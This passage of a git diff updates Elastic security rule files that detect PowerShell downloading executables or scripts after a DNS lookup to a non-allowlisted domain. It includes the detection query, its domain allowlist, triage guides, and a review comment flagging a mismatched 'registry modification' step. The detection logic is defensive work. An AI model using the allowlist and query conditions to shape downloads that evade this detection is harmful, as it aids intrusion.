Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json index 9a5f86c1d21..385f795d500 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json 
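Review bot: The investigation guide on the new `"note"` line still directs analysts to search for logon events `after the registry modification`, but the `"query"` on the same line correlates a PowerShell DNS lookup with an `exe`/`dll`/`ps1`/`bat` file creation and never touches the registry, so the step reads as a carry-over from a registry-persistence guide. Suggested wording: `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the file download.` The same sentence appears in the `_107.json` and `_108.json` note hunks below (and in the `_105.json` note whose hunk starts before this view), so it should be corrected once rather than per version. These rule files appear to be generated from the upstream detection-rules content, in which case the fix presumably belongs at that source and would flow into the next bundle.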
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json index 81d37018749..db97c68b75e 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=30s\n\n[network where host.os.type == \"windows\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\n \"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\",\n \"*.windowsupdate.com\", \"metadata.google.internal\", \"dist.nuget.org\",\n \"artifacts.elastic.co\", \"*.digicert.com\", \"packages.chocolatey.org\",\n \"outlook.office365.com\"\n ) and not user.id : \"S-1-5-18\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json new file mode 100644 index 00000000000..74321ef3e6b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies powershell.exe being used to download an executable file from an untrusted remote destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=30s\n\n[network where host.os.type == \"windows\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\n \"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\",\n \"*.windowsupdate.com\", \"metadata.google.internal\", \"dist.nuget.org\",\n \"artifacts.elastic.co\", \"*.digicert.com\", \"packages.chocolatey.org\",\n \"outlook.office365.com\"\n ) and not user.id : \"S-1-5-18\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"33f306e8-417c-411b-965c-c2812d6d3f4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "33f306e8-417c-411b-965c-c2812d6d3f4d_109", + "type": "security-rule" +} \ No newline at end of file diff --git 